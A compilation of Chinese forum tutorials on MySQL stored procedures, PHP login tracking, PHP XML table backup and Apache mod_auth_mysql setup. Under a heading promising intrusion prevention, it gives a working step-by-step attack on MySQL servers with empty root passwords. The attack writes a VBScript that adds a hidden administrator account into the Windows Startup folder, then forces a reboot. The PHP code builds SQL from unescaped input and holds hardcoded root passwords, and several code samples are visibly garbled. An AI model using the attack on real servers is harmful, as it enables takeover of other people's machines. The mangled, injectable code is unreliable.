CREATE FUNCTION 函数名 ([函数参数[,...]])     RETURNS 返回类型     [特性 ...] 函数体

过程参数:
[ IN | OUT | INOUT ] 参数名 参数类型
函数参数:
参数名 参数类型
返回类型:
有效的MySQL数据类型即可
特性:

LANGUAGE SQL   | [NOT] DETERMINISTIC   | { CONTAINS SQL | NO SQL | READS SQL DATA | MODIFIES SQL DATA }   | SQL SECURITY { DEFINER | INVOKER }   | COMMENT 'string'

过程体/函数体:格式如下：

BEGIN     有效的SQL语句 END

在这里不关心专有的特性，这些与SQL规范不兼容，所以characteristic(特性)的相关内容不作考虑。
//
在开发过程中有几点要注意：
1、存储过程注释:MySQL支持采用--或者/**/注释，其中前者是行注释，后者是段式注释
2、变量首先用declare申明，其中临时变量可以直接以@前缀修饰以供引用
3、直接采用MySQL的Administrator管理器编辑时，可以直接采用如下函数文本录入；
但若在脚本中自动导入存储过程或函数时，由于MySQL默认以";"为分隔符，则过程体的每一句
都被MySQL以存储过程编译，则编译过程会报错；所以要事先用DELIMITER关键字申明当前段分隔符
用完了就把分隔符还原。 如下所示：

DELIMITER ＄＄        Stored Procedures and Functions        DELIMITER ;

4、MySQL支持大量的内嵌函数，有些是和大型商用数据库如oracle、informix、sybase等一致，但也有些函数名称不一致，但功能一致；或者有些名称一致，但功能相异，这个特别对于从这些数据库开发转过来的DBA要注意。
5、存储过程或函数的调试：我目前还没有研究MySQL所带的各种工具包，还不清楚其提供了调试工具没有，不过编译错误相对好查找；至于业务流程的调试，可以采用一个比较笨的方法，就是创建一个调试表，在包体中各个流程点都插入一条记录，以观察程序执行流程。这也是一个比较方便的笨办法。^_^
下面是2个例子，提供了一种字串加密的算法，每次以相同的入参调用都会得到不同的加密结果，
算法相对比较简单，不具备强度。分别以函数和过程的形式分别实现如下：
(1)函数
eg:

/**/      set len=LENGTH(inpass);      if((len<=0) or (len>10)) then          return "";      end if;      set offset=(SECOND(NOW()) mod 39)+1; /*根据秒数取模*/      /*insert into  testtb values(offset,'offset: ');*/      set string_out='YN8K1JOZVURB3MDETS5GPL27AXWIHQ94C6F0#＄_';  /*密钥*/      set string_in='_＄#ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';      set outpass=CONCAT(outpass,SUBSTRING(string_out,offset,1)); /*     insert into  testtb values(2,outpass);*/      set string_out=CONCAT(string_out,string_out);      set @i=0;      REPEAT        set @i=@i+1;        set outpass=CONCAT(outpass,SUBSTR(string_out,INSTR(string_in,SUBSTRING (inpass,@i,1))+offset,1)); /*       insert into  testtb values(@i+2,outpass);*/      UNTIL (@i>=len)      end REPEAT;      return outpass; END

CREATE FUNCTION fun_addmm(inpass varchar(10)) RETURNS varchar(11)
BEGIN
declare string_in varchar(39);
declare string_out varchar(78);
declare offset tinyint(2);
declare outpass varchar(30) default ';
declare len tinyint;
/*declare i tinyint;*/
(2)过程

CREATE PROCEDURE `pro_addmm`(IN inpass varchar(10),OUT outpass varchar(11)) BEGIN      declare string_in varchar(39);      declare string_out varchar(78);      declare offset tinyint(2);                     declare len tinyint;      set outpass=';      set len=LENGTH(inpass);      if((len<=0) or (len>10)) then          set outpass=';      else          set offset=(SECOND(NOW()) mod 39)+1;          set string_out='YN8K1JOZVURB3MDETS5GPL27AXWIHQ94C6F0#＄_';          set string_in='_＄#ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';          set outpass=CONCAT(outpass,SUBSTRING(string_out,offset,1));          set string_out=CONCAT(string_out,string_out);          set @i=0;          REPEAT                set @i=@i+1;                set outpass=CONCAT(outpass,SUBSTR(string_out,INSTR(string_in,SUBSTRING (inpass,@i,1))+offset,1));          UNTIL (@i>=len)          end REPEAT;      end if; END

执行结果如下：

mysql> call pro_addmm('zhouys',@a); Query OK, 0 rows affected (0.00 sec) mysql> SELECT @a; +---------+ | @a      | +---------+ | U_PI6＄4 | +---------+ 1 row in set (0.00 sec) mysql> call pro_addmm('zhouys',@a); Query OK, 0 rows affected (0.00 sec) mysql> SELECT @a; +---------+ | @a      | +---------+ | 9P8UEGM | +---------+ 1 row in set (0.00 sec) mysql> select fun_submm('U_PI6＄4'); +----------------------+ | fun_submm('U_PI6＄4') | +----------------------+ | ZHOUYS               | +----------------------+ 1 row in set (0.00 sec)

加密算法有几个弱点：
1、不支持大小写
2、不支持中文
3、加密强度不够
有兴趣的人可以研究一下解密函数如何编写，这里就不赘述了。

如何防止入侵：My SQL各种攻击方法大全

MYSQL用户ROOT密码为空时是一个很大的漏洞，在网上也有许多一些利用此漏洞的方法，一般就是写一个ASP或PHP的后门，不仅很麻烦，而且还要猜解网站的目录，如果对方没有开IIS，那我们岂不没办法了？？

后来，自己思索想到一个办法，且在测试的几台有此漏洞的机中均获得了成功，现将攻击方法公布如下：

1、连接到对方MYSQL 服务器

mysql -u root -h 192.168.0.1

mysql.exe 这个程序在你安装了MYSQL的的BIN目录中

2、让我们来看看服务器中有些什么数据库

mysql>show databases;

MYSQL默认安装时会有MYSQL、TEST这两个数据库，如果你看到有其它的数据库那么就是用户自建的数据库。

3、让我们进入数据库

mysql>use test;

我们将会进入test数据库中

4、查看我们进入数据库中有些什么数据表

mysql>show tables;

默认的情况下，test中没有任何表的存在。

以下为关键的部分

5、在TEST数据库下创建一个新的表；

mysql>create table a (cmd text);

好了，我们创建了一个新的表，表名为a，表中只存放一个字段，字段名为cmd，为text文本。

6、在表中插入内容


mysql>insert into a values ("set wshshell=createobject (""wscript.shell"" ) " ); mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user zjl317 zjl317 /add"",0) " ); mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators zjl317 /add"",0) " );


注意双引号和括号以及后面的“0”一定要输入！我们将用这三条命令来建立一个VBS的脚本程序！

7、好了，现在我们来看看表a中有些什么

mysql>select * from a;

我们将会看到表中有三行数据，就是我们刚刚输入的内容，确认你输入的内容无误后，我们来到下一步

8、输出表为一个VBS的脚本文件

mysql>select * from a into outfile "c:\\\\docume~1\\\\alluse~1\\\\「开始」菜单\\\\程序\\\\启动\\\\a.vbs";

我们把我们表中的内容输入到启动组中，是一个VBS的脚本文件！注意“\\"符号。

9、看到这大家肯定知道了，就是利用MYSQL输出一个可执行的文件而已。为什么不用BAT呢，因为启动运行时会有明显的DOS窗口出来，而用VBS脚本则可以完全隐藏窗口且不会有错误提示！本来，应该还有一句完成脚本后自动删除此脚本的，但是中文目录实在无法处理，只有作罢！好了，找个工具攻击135让服务器重启吧，几分钟以后你就是管理员了。

浅谈php+mysql身份验证的方法

浅谈PHP+MYSQL身份验证的方法

　近日在为学校制做校友录时，需要身份验证，在对比之后决定采用PHP+MYSQL进行身份验证。  
　　  
　　之前也曾考虑过用cookies或session。但是用cookies，在用户离线再上线后，只要cookies不过期，不用登录仍然可以保持在线，这对于网吧来说是个隐患。而且用户可以关闭cookies，这样身份验证就不成功。也考虑过用session,session在浏览过程中不断的将访问信息加入到session中，如果用户在网站内时间很长，浏览的页面很多，就用导致session越来越大，浏览速度降低，最后只有重新登录，  
虽然这种情况不多见，但不是我们所希望的。  
　　  
　　我在做这个身份验证时的想法是，在身份验证的同时，记录浏览信息。  
　　用户ID在每个页面间传递，ID值是用MD5()函数加密得到的。验证函数是validate_id()，返回值为(0,1),成功为“1”。  

　　思路：  

　　　　判断被传入的ID值是否为匿名登录ID(a684dd572b1887661782981659331eed)，32位,如果是返回0，并且将浏览信息加入数据库。如果否，则查询数据库，看数据库中的用户ID，用户IP与传入的ID，IP值是否相等并且最近浏览时间距当前时间不到20分钟的记录。  
　　　　  
　　　　判断得到的记录数，如果为0，则认为离线，并用匿名ID登录浏览信息，返回0。记录不为0时，将用户ID，用户IP值，加入数据库，返回1。  

创建数据库：  
　　  
　　create table logging{  

id int unsigned not null primary key auto_increment,  

user_id char(32) not null,//用户ID  

logging_ip varchar(20) not null,//记录用户IP地址  

page_name varchar(30) not null,//浏览网页名  

view_time timestamp not null,  

student_id varchar(20)  

);  
创建函数：  

/*-----begin function validate-id()---------------  
验证用户是否登录  

------------------------------------------------*/

复制内容到剪贴板

代码:

function validate_id($link,$id,$ip,$page_name,$student_id=""){  
if ($id == a684dd572b1887661782981659331eed or $id = '') {
        $query = 'insert into logging(user_id,logging_ip,page_name,student_id) values ("a684dd572b1887661782981659331eed","' . $ip . '","' . $page_name . '","anonym");';
        $result = mysql_db_query("web", $query, $link);
        return (0);
} else {
        $year = strftime("%Y");
        $month = strftime("%m");
        $day = strftime("%d");
        $hour = strftime("%H");
        $min = strftime("%M");
        $sec = strftime("%S");
        echo $time_string = $year . $month . $day . $hour . $min . $sec;
        // echo ("<br>");
        // echo "$year-$month-$day $hour-$min-$sec<br>";
        // ---------begin if's---------------------------
        if (($min -= 20) < 0) {
                $min += 60;
                if (($hour -= 1) == -1) {
                        $hour += 24;
                        if (($day -= 1) == 0) {
                                switch ($month) {
                                        case 12 days = 30;
                                                break;
                                        case 1 days = 31;
                                                break;
                                        case 2 :if (($year / 4 == 0)and($year / 100 != 0)or($year / 400 == 0)) {
                                                        $days = 29;
                                                } else {
                                                        $days = 28;
                                                }
                                                break;
                                        case 3 days = 31;
                                                break;
                                        case 4 days = 30;
                                                break;
                                        case 5 days = 31;
                                                break;
                                        case 6 days = 30;
                                                break;
                                        case 7 days = 31;
                                                break;
                                        case 8 days = 31;
                                                break;
                                        case 9 days = 30;
                                                break;
                                        case 10 days = 31;
                                                break;
                                        case 11 days = 30;
                                                break;
                                }
                                $day += $days;
                                if (($month -= 1) == 0) {
                                        $month += 12;
                                        $year -= 1;
                                }
                        }
                }
        }
        // ----------------------------------end if's
        setType($month, "integer");
        if ($month < 10) {
                setType($month, "string");
                $month = '0' . $month;
        }
        setType($day, "integer");
        if ($day < 10) {
                setType($day, "string");
                $day = '0' . $day;
        }
        setType($hour, "integer");
        if ($hour < 10) {
                setType($min, "string");
                $hour = '0' . $hour;
        }
        setType($min, "integer");
        if ($min < 10) {
                setType($min, "string");
                $min = '0' . $min;
        }

        echo '<br>' . $time_string = $year . $month . $day . $hour . $min . $sec;
        // echo "<br>$year-$month-$day $hour-$min-$sec<br>";
        // echo ("<br>");
        $query = "select id from logging where user_id='$id' and logging_ip='$ip' and view_time>'$time_string';";
        $result = mysql_db_query("web", $query, $link);
        $count = mysql_num_rows($result);
        if ($count == 0) {
                // echo $query="insert into logging(user_id,logging_ip,page_name) values ('a684dd572b1887661782981659331eed','$ip','$page_name');";
                $result = mysql_db_query("web", $query, $link);
                return (0);
        } else {
                $query = "insert into logging(user_id,logging_ip,page_name) values('$id','$ip','$page_name')";
                $result = mysql_db_query("web", $query, $link);
                return (1);
        }
} //end if  
}  
//----------------------------end function validate-id---------  

　　这个验证方法很简单，而且没有考虑到用户在登录后再登录的情况，大家可以自己加上。  

　　如果用cookies，可能用setcookies()建立用户ID，再从环境变量$HTTP_COOKIE或$HTTP_COOKIE_VARS中读取。都是一样的，不过应该保证用户没有cookies。

[ 本帖最后由 aming 于 2008-4-4 10:42 编辑 ]

用 PHP 实现 XML 备份 Mysql 数据库

以下是在Linux下通过Apache PHP对Mysql数据库的备份的文件代码：

文件一、Listtable.php （文件列出数据库中的所有表格，供选择备份）


请选择要备份的表格:

复制内容到剪贴板

代码:

<?
$con=mysql_connect('localhost','root','xswlily');
$lists=mysql_list_tables("embed",$con);
//数据库连接代码
$i=0;
while($i$tb_name=mysql_tablename($lists,$i);
echo "".$tb_name."
";
//列出所有的表格
$i ;}

?>

文件二、Backup.php

复制内容到剪贴板

代码:

<?if ($table=="") header("Location:listtable.php");?>

<?
$con=mysql_connect('localhost','root','xswlily');
$query="select * from $table ";
//数据库查询
$result=mysql_db_query("embed",$query,$con);
$filestr="<"."?xml version=\"1.0\" encoding=\"GB2312\"?".">";
$filestr.="<".$table."s>";
while ($row=mysql_fetch_array($result))
//列出所有的记录
{$filestr.="<".$table.">";
$fields=mysql_list_fields("embed",$table,$con);
$j=0;
//$num_fields=mysql_field_name($fields,$j);
//echo $num_fields;
while ($j$num_fields=mysql_field_name($fields,$j);
$filestr.="<".$num_fields.">";
$filestr.=$row[$j];
$filestr.="";
$j ;}
$filestr.="";
}
$filestr.="";
echo $filestr;
//以下是文件操作代码
$filename=$table.".xml";
$fp=fopen("$filename","w");
fwrite($fp,$filestr);
fclose($fp);
Echo "数据表".$table."已经备份成功！";?>

通过以上文件的操作就可以实现对数据库中选定的表格进行备份.

以上主要介绍了通过PHP实现XML备份数据库的操作方法，其实并不复杂，通过XML，我们可以备份各种各样的数据库，当然也可以通过相关的方法将备份的XML文档恢复到数据库中，这里就不详细描述了。

Apache与MySQL整合实现基本身份认证

　Apache来实现基本的用户身份认证有很多种方式，比如最常见的txt文本和DBM格式，但在负载很重的server上-这些都不是理想的方法，文本的形式是基于平面的，性能很差而且也不安全;DBM好些但在千或万级用户时还是力不从心，于是用database做后台存储则是很好的方法-比平面搜索更有效而且安全，用户口令以DES加密形式存储在数据库的表中。

　　这种实现要归功于Apache本身出色的模块化结构--以及开放的DSO方式，可以使开发人员完成大量的第三方模块，并扩充Apache的功能。我在本文中只写了用Mysql做后台存储--此外还可用Postgresql,Oracle等来完成，原理一样-都是用各自的模块。

　　让我们开始吧--先去modules.apache.org找到mod_auth_mysql--会有两个我们要用DSO那个-事实上直接去ftp://ftp.kcilink.com/pub/下一个mod_auth_mysql.c.gz就行-好-把它解开是一个mod_auth_mysql.c-好-我们用apxs来生成DSO模块(前题是你用DSO模式编译的Apache)--apxs -c -i -a -L/usr/local/lib/mysql -lmysqlclient >-lm mod_auth_mysql.c即可--这里注意一定要这么写---L/usr/local/lib/mysql是mysql的客户库位置，我假定mysql是用的缺省安装)---如果不加在起动Apache时会报错-无法装载此模块。

　　好了看看httpd.conf中应该有LoadModule mysql_auth_module libexec/mod_auth_mysql.so和AddModule mod_auth_mysql.c这两句了，重起Apache也不应该有问题。

　　然后我们进入mysql,mysql>create database auth;

mysql>use auth;
mysql> create table mysql_auth (
-> user_name char(20) not null,
-> user_passwd char(25),
-> groups char(25),
-> primary key (username) );


　　注意字段名一定是user_name和user_passwd这个。再插入几条记录：

mysql> insert into mysql_auth values
('xingfei2',encrypt("abcde"),'xingfei');
Query OK, 1 row affected (0.00 sec)
mysql> insert into mysql_auth values
('xingfei',encrypt("abcde"),'xingfei');
Query OK, 1 row affected (0.00 sec)


　　这里abcde是口令-用encrypt函数来进行加密，用的是DES算法-这是和unix的password等同的算法-而不是mysql本身加密的password()函数。

　　最后在要保护的目录里建一个.htaccess(别忘了把AllowOverride all打开)内容如下：

authname "xingfei"
authtype basic
AuthMySQLHost localhost ---mysql主机名
authmysqluser root ---mysql用户
authmysqlpassword abc ---mysql用户的口令
AuthMySQLDB auth ---用户所用的库-也就是我们建的库
AuthMySQLUserTable mysql_auth ---所用的表
AuthMySQLGroupField groups ---用户组的字段名
require group xingfei
require user xingfei


　　可以把用户都放在一个组里-只要是这个组里的用户即可通过认证,也可require单个或多个用户。